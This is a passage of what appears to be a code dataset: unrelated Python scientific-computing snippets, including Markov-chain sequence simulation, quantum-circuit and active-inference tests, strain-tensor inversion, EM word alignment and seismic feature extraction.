0.25, 0.25], [0.25, 0.25, 0.25, 0.25]] \n matrix = [[0.4, 0.3, 0.2, 0.1], [0.4, 0.3, 0.2, 0.1], [0.4, 0.3, 0.2, 0.1], [0.4, 0.3, 0.2, 0.1]] \n step += 1 # add one to the range because we remove it at the end\n sims = [] # List to hold the results of the Marcov chain\n sims.append(i) # append the seed value to the sims list\n for x in range(step):\n \n if sims[-1] == 'A':\n w = np.random.random() # Random number generator\n # the next set of if statements determine where the random number \n # sits on the number line of probabilities\n if matrix[0][0] > w:\n sims.append('A')\n elif matrix[0][1] + matrix[0][0] > w:\n sims.append('C')\n elif matrix[0][2] + matrix[0][1] + matrix[0][0] > w:\n sims.append('G')\n else:\n sims.append('T')\n elif sims[-1] == 'C':\n x = np.random.random()\n if matrix[1][0] > x:\n sims.append('A')\n elif matrix[1][1] + matrix[1][0] > x:\n sims.append('C')\n elif matrix[1][2] + matrix[1][1] + matrix[1][0] > x:\n sims.append('G')\n else:\n sims.append('T')\n \n elif sims[-1] == 'G':\n y = np.random.random()\n if matrix[2][0] > y:\n sims.append('A')\n elif matrix[2][1] + matrix[2][0] > y:\n sims.append('C')\n elif matrix[2][2] + matrix[2][1] + matrix[2][0] > y:\n 
sims.append('G')\n else:\n sims.append('T')\n\n else:\n z = np.random.random()\n if matrix[3][0] > z:\n sims.append('A')\n elif matrix[3][1] + matrix[3][0] > z:\n sims.append('C')\n elif matrix[3][2] + matrix[3][1] + matrix[3][0] > z:\n sims.append('G')\n else:\n sims.append('T')\n\n return sims[1:-1] # remove the initial value (the seed)", "def test_superposition_ud_cnot():\n program = dedent(\n \"\"\"\\\n register q0[0]\n register q1[1]\n H q1\n CNOT q1 q0\n \"\"\"\n )\n\n result = run(program, run_gate_array, return_distribution=True)\n assert isclose(result, [0.5, 0.0, 0.0, 0.5]).all()", "def MPinv(list_of_ch,direction, angle, azimuth):\n\n\n \"\"\"~~~~~~~~~~~ Input conditions ~~~~~~~~~~~~~~\"\"\"\n ch_list = list_of_ch\n direction_deg = float(direction) #inclined direction of wellbore from North\n angle_deg = float(angle) # inclined angle of well \n azimuth_deg = float(azimuth) # core orientation from North or inclined direction \n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n azimuth_deg = azimuth_deg - 45\n\n \"\"\"~~~~~~~~~~~ Allocate numbers to each direction (for example, xx => 0, xy => 3 etc...) ~~~~~~~~~~~~~~\"\"\"\n ch_col = ch_list.columns.values\n\n if \"xx\" in ch_col: ch_list.at[\"ch_no\",\"xx\"] =0\n if \"yy\" in ch_col: ch_list.at[\"ch_no\",\"yy\"] =1\n if \"zz\" in ch_col: ch_list.at[\"ch_no\",\"zz\"] =2\n if \"xy\" in ch_col: ch_list.at[\"ch_no\",\"xy\"] =3\n if \"yx\" in ch_col: ch_list.at[\"ch_no\",\"yx\"] =4\n if \"yz\" in ch_col: ch_list.at[\"ch_no\",\"yz\"] =5\n if \"zy\" in ch_col: ch_list.at[\"ch_no\",\"zy\"] =6\n if \"zx\" in ch_col: ch_list.at[\"ch_no\",\"zx\"] =7\n if \"xz\" in ch_col: ch_list.at[\"ch_no\",\"xz\"] =8\n\n ch = ch_list.loc[\"ch_no\",:].values\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n Number_of_vector = len(ch)\n No_v = Number_of_vector\n direction_rad = direction_deg*pi*180**(-1) \n angle_rad = angle_deg*pi*180**(-1) \n azimuth_rad = azimuth_deg*pi*180**(-1) \n\n\n \"\"\"~~~~~~~~ Create matrix of Direction Cosine vectors~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n c=np.cos(0.25*pi)\n s=np.sin(0.25*pi)\n n = np.zeros((3,9))\n\n n[:,0] = np.array([1,0,0])\n n[:,1] = np.array([0,1,0])\n n[:,2] = np.array([0,0,1])\n n[:,3] = np.array([c,s,0])\n n[:,4] = np.array([c,-s,0])\n n[:,5] = np.array([0,c,s])\n n[:,6] = np.array([0,c,-s])\n n[:,7] = np.array([c,0,s])\n n[:,8] = np.array([-c,0,s])\n\n\n \"\"\"~~~~~~~~~~~~~~ coordinate transformation from 'ASR local co-ordinate' to 'Geological co-ordinate' ~~~~~~~~~~~~~~~~~\"\"\"\n cdr = np.cos(direction_rad)\n sdr = np.sin(direction_rad)\n\n caz = np.cos(azimuth_rad)\n saz = np.sin(azimuth_rad)\n\n can = np.cos(angle_rad)\n san = np.sin(angle_rad)\n\n Rdr = np.array([[cdr, sdr, 0],[-sdr, cdr, 0],[0, 0, 1]]) #counter_clockwise\n Ran = np.array([[1, 0, 0],[0, can, san],[0, -san, can]])\n Raz = np.array([[caz, -saz, 0],[saz, caz, 0],[0, 0, 1]])\n\n R1 = Ran.dot(Rdr)\n R2 = Raz.dot(R1)\n\n for i in range(0,9):\n n[:,i] = R2.dot(n[:,i])\n n= np.round(n,6)\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n\n\n\n\n \"\"\"~~~~~~~~ Create matrix A (b = Ax: b;Observed normal strain data, x;strain tensor component which we have to determine) ~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n X = np.empty((No_v,6))\n\n for i in range(0,No_v):\n cc = ch[i]\n X[i,:] = np.array([n[0,cc]**2, 
n[1,cc]**2, n[2,cc]**2, 2*n[0,cc]*n[1,cc], 2*n[1,cc]*n[2,cc], 2*n[2,cc]*n[0,cc]])\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n\n X_inv = np.linalg.pinv(X) # Calculate Moore-Penrose inverse matrix\n\n return X_inv", "def test_active_inference_SPM_1a(self):\n array_path = os.path.join(os.getcwd(), DATA_PATH + \"vbx_test_1a.mat\")\n mat_contents = loadmat(file_name=array_path)\n\n A = mat_contents[\"A\"][0]\n B = mat_contents[\"B\"][0]\n C = to_arr_of_arr(mat_contents[\"C\"][0][0][:,0])\n obs_matlab = mat_contents[\"obs\"].astype(\"int64\")\n policy = mat_contents[\"policies\"].astype(\"int64\") - 1\n t_horizon = mat_contents[\"t_horizon\"][0, 0].astype(\"int64\")\n actions_matlab = mat_contents[\"actions\"].astype(\"int64\") - 1\n qs_matlab = mat_contents[\"qs\"][0]\n xn_matlab = mat_contents[\"xn\"][0]\n vn_matlab = mat_contents[\"vn\"][0]\n\n likelihoods_matlab = mat_contents[\"likelihoods\"][0]\n\n num_obs, num_states, _, num_factors = get_model_dimensions(A, B)\n obs = convert_observation_array(obs_matlab, num_obs)\n T = len(obs)\n\n agent = Agent(A=A, B=B, C=C, inference_algo=\"MMP\", policy_len=1, \n inference_horizon=t_horizon, use_BMA = False, \n policy_sep_prior = True)\n \n actions_python = np.zeros(T)\n\n for t in range(T):\n o_t = (np.where(obs[t])[0][0],)\n qx, xn_t, vn_t = agent.infer_states_test(o_t)\n q_pi, efe= agent.infer_policies()\n action = agent.sample_action()\n\n actions_python[t] = action\n\n xn_python = build_xn_vn_array(xn_t)\n vn_python = build_xn_vn_array(vn_t)\n\n if t == T-1:\n xn_python = xn_python[:,:,:-1,:]\n vn_python = vn_python[:,:,:-1,:]\n\n start_tstep = max(0, agent.curr_timestep - agent.inference_horizon)\n end_tstep = min(agent.curr_timestep + agent.policy_len, T)\n\n xn_validation = xn_matlab[0][:,:,start_tstep:end_tstep,t,:]\n vn_validation = vn_matlab[0][:,:,start_tstep:end_tstep,t,:]\n\n self.assertTrue(np.isclose(xn_python, xn_validation).all())\n self.assertTrue(np.isclose(vn_python, vn_validation).all())\n \n self.assertTrue(np.isclose(actions_matlab[0,:],actions_python[:-1]).all())", "def __init__(self, u1=(1,0,0), u2=(0,1,0), u3=(0,0,1)):\n u1 = vec3(u1)\n u2 = vec3(u2)\n u3 = vec3(u3)\n\n if triple_scalar_product(u1, u2, u3) != 1:\n print >> sys.stderr, \"!! 
Invalid lattice vectors: u1 = %s, u2 = %s, u3 = %s\" % (u1,u2,u3)\n self.e1 = vec3(1,0,0)\n self.e2 = vec3(0,1,0)\n self.e3 = vec3(0,0,1)\n else:\n s1 = square(u1)\n s2 = square(u2)\n d12 = dot(u1, u2)\n d23 = dot(u2, u3)\n d13 = dot(u1, u3)\n alpha = -d12/s1\n gamma = -(alpha*d13 + d23)/(alpha*d12 + s2)\n beta = -(d13 + gamma*d12)/s1\n self.e1 = u1\n self.e2 = u2 + alpha*u1\n self.e3 = u3 + beta*u1 + gamma*u2\n\n if verbose:\n print(\"e1 = %s\" % self.e1)\n print(\"e2 = %s\" % self.e2)\n print(\"e3 = %s\" % self.e3)\n\n self.L1 = length(self.e1)\n self.L2 = length(self.e2)\n self.L3 = length(self.e3)\n self.n1 = self.e1/self.L1\n self.n2 = self.e2/self.L2\n self.n3 = self.e3/self.L3\n self.cells = []\n\n v0 = vec3(0,0,0)\n self.v = [v0,\n v0 + self.e3,\n v0 + self.e2,\n v0 + self.e2 + self.e3,\n v0 + self.e1,\n v0 + self.e1 + self.e3,\n v0 + self.e1 + self.e2,\n v0 + self.e1 + self.e2 + self.e3]\n\n # Compute bounding box of cuboid\n xs = [vk.x for vk in self.v]\n ys = [vk.y for vk in self.v]\n zs = [vk.z for vk in self.v]\n vmin = vec3(min(xs), min(ys), min(zs))\n vmax = vec3(max(xs), max(ys), max(zs))\n\n # Extend to nearest integer coordinates\n ixmin = int(floor(vmin.x))\n ixmax = int(ceil(vmax.x))\n iymin = int(floor(vmin.y))\n iymax = int(ceil(vmax.y))\n izmin = int(floor(vmin.z))\n izmax = int(ceil(vmax.z))\n if verbose:\n print(\"ixmin, ixmax = %d, %d\" % (ixmin,ixmax))\n print(\"iymin, iymax = %d, %d\" % (iymin,iymax))\n print(\"izmin, izmax = %d, %d\" % (izmin,izmax))\n\n # Determine which cells (and which faces within those cells) are non-trivial\n for ix in range(ixmin, ixmax):\n for iy in range(iymin, iymax):\n for iz in range(izmin, izmax):\n shift = vec3(-ix, -iy, -iz)\n faces = [Plane(self.v[0] + shift, +self.n1),\n Plane(self.v[4] + shift, -self.n1),\n Plane(self.v[0] + shift, +self.n2),\n Plane(self.v[2] + shift, -self.n2),\n Plane(self.v[0] + shift, +self.n3),\n Plane(self.v[1] + shift, -self.n3)]\n\n c = Cell(ix, iy, iz)\n skipcell = False\n for f in faces:\n r = UnitCubeTest(f)\n if r == +1:\n # Unit cube is completely above this plane; this cell is empty\n continue\n elif r == 0:\n # Unit cube intersects this plane; keep track of it\n c.faces.append(f)\n elif r == -1:\n skipcell = True\n break\n\n if skipcell or len(c.faces) == 0:\n if verbose:\n print(\"Skipping cell at (%d,%d,%d)\" % (ix,iy,iz))\n continue\n else:\n self.cells.append(c)\n if verbose:\n print(\"Adding cell at (%d,%d,%d)\" % (ix,iy,iz))\n\n # For the identity remapping, use exactly one cell\n if len(self.cells) == 0:\n self.cells.append(Cell())\n\n # Print the full list of cells\n if verbose:\n print(\"%d non-empty cells\" % len(self.cells))\n for c in self.cells:\n print(\"Cell at (%d,%d,%d) has %d non-trivial planes\" % (c.ix,\n c.iy, c.iz, len(c.faces)))", "def solve_LF(self):\n self.u = zeros(self.N)\n self.u[0] = self.u0\n self.u[1] = self.u1\n u = self.u\n f= self.f\n dt = self.dt\n t = self.t\n N = self.N\n for n in xrange(1,N-1):\n u[n+1] = 2*dt*f(u[n],t[n]) + u[n-1]\n #return t,u", "def test_LM(self):\n\t\t\n\t\tprecision = 10**-8\n\t\t\t\t \n\t\tif self.n == 1:\n\t\t\t\t \n\t\t\tP_sum = sum(self.estimate_prob('', w) for w in self.vocab)\n\t\t\t\n\t\t\tassert abs(1.0 - P_sum) < precision, 'Probability mass does not sum up to one.'\n\t\t\t\t \n\t\telif self.n == 2:\n\t\t\thistories = ['the', 'in', 'at', 'blue', 'white']\n\t\t\t\t \n\t\t\tfor h in histories:\n\t\t\t\t \n\t\t\t\tP_sum = sum(self.estimate_prob(h, w) for w in self.vocab)\n\t\t\t\t\n\t\t\t\tassert abs(1.0 - P_sum) < precision, 
'Probability mass does not sum up to one for history' + h\n\t\t\t\t\t \n\t\tprint('TEST SUCCESSFUL!')", "def __v(pk: float, pna: float, pcl: float, pca: float) -> float:\n ex_ion = pk * ex_k + pna * ex_na + pcl * in_cl + pca * ex_ca\n in_ion = pk * in_k + pna * in_na + pcl * ex_cl + pca * in_ca\n v = r * t / f * np.log(ex_ion/in_ion) * 1000\n return v", "def set_T_lm(self):\n self.delta_T_lm_array = ( ((self.exh.T_outlet_array -\n self.cool.T_inlet_array) - (self.exh.T_inlet_array -\n self.cool.T_outlet_array)) / np.log((self.exh.T_outlet_array -\n self.cool.T_inlet_array) / (self.exh.T_inlet_array -\n self.cool.T_outlet_array)) )", "def comp_vext_tem_pyth(self, ao_log=None, numba_parallel=True):\n\n def c2r_lm(conv, clm, clmm, m):\n \"\"\"\n clm: sph harmonic l and m\n clmm: sph harmonic l and -m\n convert from real to complex spherical harmonic\n for an unique value of l and m\n \"\"\"\n rlm = 0.0\n if m == 0:\n rlm = conv._c2r[conv._j, conv._j]*clm\n else:\n rlm = conv._c2r[m+conv._j, m+conv._j]*clm +\\\n conv._c2r[m+conv._j, -m+conv._j]*clmm\n\n if rlm.imag > 1e-10:\n print(rlm)\n raise ValueError(\"Non nul imaginary paert for c2r conversion\")\n return rlm.real\n\n def get_index_lm(l, m):\n \"\"\"\n return the index of an array ordered as \n [l=0 m=0, l=1 m=-1, l=1 m=0, l=1 m=1, ....]\n \"\"\"\n return (l+1)**2 -1 -l + m\n\n warnings.warn(\"Obselete routine use comp_vext_tem\")\n\n if use_numba:\n get_time_potential = nb.jit(nopython=True, parallel=numba_parallel)(get_tem_potential_numba)\n V_time = np.zeros((self.time.size), dtype=np.complex64)\n\n aome = ao_matelem_c(self.ao_log.rr, self.ao_log.pp)\n me = ao_matelem_c(self.ao_log) if ao_log is None else aome.init_one_set(ao_log)\n atom2s = np.zeros((self.natm+1), dtype=np.int64)\n for atom,sp in enumerate(self.atom2sp): \n atom2s[atom+1]= atom2s[atom] + me.ao1.sp2norbs[sp]\n\n R0 = self.vnorm*self.time[0]*self.vdir + self.beam_offset\n rr = self.ao_log.rr\n dr = (np.log(rr[-1])-np.log(rr[0]))/(rr.size-1)\n dt = self.time[1]-self.time[0]\n dw = self.freq_symm[1] - self.freq_symm[0]\n wmin = self.freq_symm[0]\n tmin = self.time[0]\n nff = self.freq.size\n ub = self.freq_symm.size//2 - 1\n l2m = [] # list storing m value to corresponding l\n fact_fft = np.exp(-1.0j*self.freq_symm[ub:ub+nff]*tmin)\n pre_fact = dt*np.exp(-1.0j*wmin*(self.time-tmin))\n\n for l in range(me.jmx+1):\n lm = []\n for m in range(-l, l+1):\n lm.append(m)\n l2m.append(np.array(lm))\n\n for atm, sp in enumerate(self.atom2sp):\n rcut = self.ao_log.sp2rcut[sp]\n center = self.atom2coord[atm, :]\n rmax = find_nearrest_index(rr, rcut)\n\n si = atom2s[atm]\n fi = atom2s[atm+1]\n\n for mu, l in enumerate(self.pb.prod_log.sp_mu2j[sp]):\n s = self.pb.prod_log.sp_mu2s[sp][mu]\n f = self.pb.prod_log.sp_mu2s[sp][mu+1]\n\n fr_val = self.pb.prod_log.psi_log[sp][mu, :]\n inte1 = np.sum(fr_val[0:rmax+1]*rr[0:rmax+1]**(l+2)*rr[0:rmax+1]*dr)\n\n for k in range(s, f):\n V_time.fill(0.0)\n\n m = l2m[l][k-s]\n ind_lm = get_index_lm(l, m)\n ind_lmm = get_index_lm(l, -m)\n\n if use_numba:\n get_time_potential(self.time, R0, self.vnorm, self.vdir, center, rcut, inte1,\n rr, dr, fr_val, me._c2r, l, m, me._j, ind_lm, ind_lmm, V_time)\n else:\n for it, t in enumerate(self.time):\n R_sub = R0 + self.vnorm*self.vdir*(t - self.time[0]) - center\n norm = np.sqrt(np.dot(R_sub, R_sub))\n\n if norm > rcut:\n I1 = inte1/(norm**(l+1))\n I2 = 0.0\n else:\n rsub_max = find_nearrest_index(rr, norm)\n\n I1 = np.sum(fr_val[0:rsub_max+1]*\n rr[0:rsub_max+1]**(l+2)*rr[0:rsub_max+1])\n I2 = 
np.sum(fr_val[rsub_max+1:]*\n rr[rsub_max+1:]/(rr[rsub_max+1:]**(l-1)))\n\n I1 = I1*dr/(norm**(l+1))\n I2 = I2*(norm**l)*dr\n clm_tem = csphar(R_sub, l)\n clm = (4*np.pi/(2*l+1))*clm_tem[ind_lm]*(I1 + I2)\n clmm = (4*np.pi/(2*l+1))*clm_tem[ind_lmm]*(I1 + I2)\n rlm = c2r_lm(me, clm, clmm, m)\n V_time[it] = rlm + 0.0j\n \n V_time *= pre_fact\n \n\n FT = fft(V_time)\n\n self.V_freq[:, si + k] = FT[ub:ub+nff]*fact_fft", "def exercise_b2_113():\r\n pass", "def trc_fgen_prefb(self,trc,dt,nspad=200,hwin=150,vlen=51):\n output=np.zeros((len(trc),((11*(vlen))+1)))\n pad=np.random.rand(nspad)/100\n trc_norm=trc/np.amax(np.abs(trc))\n trc_norm_padded=np.hstack((pad,trc_norm))\n trc_entropy=self.entropy(trc_norm_padded,50)\n trc_fdm=self.fdm(trc_norm_padded,50,np.arange(1,4),15)\n trc_slta=trigger.classic_sta_lta(trc_norm_padded,2,100)\n trc_fq_win_sum=self.fq_win_sum(trc_norm_padded,hwin,dt)\n hwin2=50\n trc_kurtosis_skew=self.kurtosis_skewness(trc_norm_padded,hwin2)\n for i,j in enumerate(trc):\n ftrc=[]\n fb=i*dt\n ftrc=np.append(ftrc,trc_norm_padded[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1])\n ftrc=np.append(ftrc,self.norm(np.gradient(np.abs(trc_norm_padded)))[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1])\n ftrc=np.append(ftrc,self.norm(trc_entropy)[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1])\n ftrc=np.append(ftrc,self.norm(np.gradient(trc_entropy))[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1]) \n ftrc=np.append(ftrc,self.norm(trc_fdm)[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1])\n ftrc=np.append(ftrc,self.norm(np.gradient(trc_fdm))[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1]) \n ftrc=np.append(ftrc,self.norm(trc_slta)[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1])\n ftrc=np.append(ftrc,self.norm(trc_fq_win_sum)[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1])\n ftrc=np.append(ftrc,self.norm(np.gradient(trc_fq_win_sum))[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1])\n ftrc=np.append(ftrc,self.norm(trc_kurtosis_skew[0])[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1])\n ftrc=np.append(ftrc,self.norm(trc_kurtosis_skew[1])[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1])\n ftrc=np.append(ftrc,1)\n output[i,:]=ftrc\n return output", "def expected_counts(p0, T, n): \n M=T.shape[0]\n if n<=M:\n return ec_matrix_vector(p0, T, n)\n else:\n return ec_geometric_series(p0, T, n)", "def p(e, t):\n return b * e ** 2", "def em_step(t, eng, fre):\n # TODO\n # Lecture Steps:\n # 1. Make a table of P(f|e) for all possible pairs of f and e, prob_tab\n # 2. Make a grid where each sentence pair is a row and each possible\n # alignment is a column\n # 3. For each sentence pair and alignment compute P(F|a,E)\n # Given aligned words f1,f2,...,fn and e1,e2,...,en in the pair:\n # P(F|a,E) = prob_tab[f1][e1] * ... * prob_tab[fn][en]\n # 4. For each sentence pair and alignment\n # divide P(F|a,E) by the sum of the P(F|a,E)'s in the row\n # this is P(a|E,F)\n # 5. For each possible word pair e and f, sum P(a|E,F) across all\n # alignments and sentence pairs for each instance that e is aligned\n # with f, this gets out a TCount table\n # 6. Sum over the rows of TCount to get the total estimates for each\n # english word e.\n # 7. 
Compute P(f|e) = TCount[f][e] / Total[e]\n # This is the model after 1 iteration.\n\n '''\n Tutorial Steps:\n initialize P(f|e)\n for a number of iterations:\n set tcount(f, e) to 0 for all f, e\n set total(e) to 0 for all e\n for each sentence pair (F, E) in training corpus:\n for each unique word f in F:\n denom_c = 0\n for each unique word e in E:\n denom_c += P(f|e) * F.count(f)\n for each unique word e in E:\n tcount(f, e) += P(f|e) * F.count(f) * E.count(e) / denom_c\n total(e) += P(f|e) * F.count(f) * E.count(e) / denom_c\n for each e in domain(total(:)):\n for each f in domain(tcount(:,e)):\n P(f|e) = tcount(f, e) / total(e)\n '''\n\n '''\n My Pseudocode:\n The Table of P(f|e) is already initiated as the AM dictionary.\n Presumably the AM is passed in as t.\n Initialize TCount as a dictionary like AM, e.g. TCount[e][f] = 0\n Initialize Total as a dictionary with the same entries as TCount[e] = 0\n for i in range(0,len(eng)):\n\n '''\n AM = dict.fromkeys(t.keys(), 0)\n Total = dict.fromkeys(t.keys(), 0)\n TCount = dict.fromkeys(t.keys(), 0)\n for key in TCount.keys():\n TCount[key] = dict.fromkeys(t[key].keys(), 0)\n AM[key] = dict.fromkeys(t[key].keys(), 0)\n\n num_sentences = min(len(eng), len(fre))\n for i in range(0, num_sentences):\n E = eng[i]\n F = fre[i]\n E_uniques = list(set(E))\n F_uniques = list(set(F))\n for f in F_uniques:\n denom_c = 0\n for e in E_uniques:\n denom_c += t[e][f] * F.count(f)\n for e in E_uniques:\n TCount[e][f] += t[e][f] * F.count(f) * E.count(e) / denom_c\n Total[e] += t[e][f] * F.count(f) * E.count(e) / denom_c\n for e in Total.keys():\n for f in TCount[e].keys():\n AM[e][f] = TCount[e][f] / Total[e]\n\n return AM", "def main() -> int:\n ucvm_out = \"\"\n for j in frange(CORNERS[\"bl\"][\"n\"], CORNERS[\"ur\"][\"n\"], SPACING):\n for i in frange(CORNERS[\"bl\"][\"e\"], CORNERS[\"ur\"][\"e\"] + SPACING, SPACING):\n ucvm_out += \"%.2f %.2f 0\\n\" % (i, j)\n os.chdir(\"/Users/davidgil/ucvm-15.10.0/bin\")\n proc = Popen(\n [\"./ucvm_query\", \"-f\", \"../conf/ucvm.conf\"], stdout=PIPE, stdin=PIPE, stderr=STDOUT\n )\n out_arr = np.zeros(\n shape=(\n int((CORNERS[\"ur\"][\"n\"] - CORNERS[\"bl\"][\"n\"]) / SPACING) + 2,\n int((CORNERS[\"ur\"][\"e\"] - CORNERS[\"bl\"][\"e\"]) / SPACING) + 2\n )\n )\n output = proc.communicate(input=ucvm_out.encode(\"ASCII\"))[0]\n i = 0\n j = 0\n for line in output.decode(\"ASCII\").split(\"\\n\")[2:-1]:\n line_split = line.split()\n try:\n out_arr[j][i] = float(line_split[4])\n except IndexError:\n print(line_split)\n if i == int((CORNERS[\"ur\"][\"e\"] - CORNERS[\"bl\"][\"e\"]) / SPACING):\n i = 0\n j += 1\n else:\n i += 1\n np.save(\"vs30.dat\", out_arr)\n return 0", "def log_operator(SE3): \n #print('SE3 log: ', SE3)\n R = SE3[:3,:3]\n t = SE3[:3,3]\n theta = arccos(0.5*(trace(R)-1)) # radians\n lnR = 0.5*(theta/sin(theta))*(R-R.T)\n omega = vee(lnR) # vee operator\n omega_skew_sym = lnR#skew_symmetric(omega.reshape(-1,))\n \n if theta <= 1e-10:\n V = eye(3)\n else:\n V = eye(3) + \\\n (theta**-2)*(1-cos(theta))*omega_skew_sym + \\\n (theta**-3)*(theta-sin(theta))*(omega_skew_sym @ omega_skew_sym)\n neu = inv(V) @ t\n\n # if theta <= 1e-10:\n # Vinv = eye(3)\n # else:\n # theta_half = 0.5*theta \n # Vinv = eye(3) - 0.5*omega_skew_sym + \\\n # (theta**-2)*(1- (theta_half*cos(theta_half)/sin(theta_half)))*(omega_skew_sym @ omega_skew_sym)\n # neu = Vinv @ t\n\n return np.hstack((neu, omega)).reshape(-1,1)", "def fig16():\n # fmt: off\n tpm = np.array([\n [0, 0, 0, 0, 0, 0, 0],\n [0, 0, 1, 0, 1, 0, 0],\n [1, 0, 1, 0, 0, 0, 
0],\n [1, 0, 0, 0, 1, 0, 0],\n [1, 0, 0, 0, 0, 0, 0],\n [1, 0, 1, 0, 1, 0, 0],\n [1, 0, 1, 0, 0, 0, 0],\n [1, 0, 0, 0, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 1, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 1, 0, 1, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 1, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 1, 0, 1, 1, 0, 0],\n [0, 0, 0, 0, 0, 1, 0],\n [0, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [1, 0, 0, 0, 0, 1, 0],\n [1, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 0, 0, 1, 0],\n [0, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [1, 0, 0, 0, 0, 1, 0],\n [1, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 0, 0, 1, 1],\n [0, 0, 1, 0, 1, 1, 1],\n [1, 0, 1, 0, 0, 1, 1],\n [1, 0, 0, 0, 1, 1, 1],\n [1, 0, 0, 0, 0, 1, 1],\n [1, 0, 1, 0, 1, 1, 1],\n [1, 0, 1, 0, 0, 1, 1],\n [1, 0, 0, 0, 1, 1, 1],\n [0, 0, 0, 1, 1, 1, 1],\n [0, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1],\n [1, 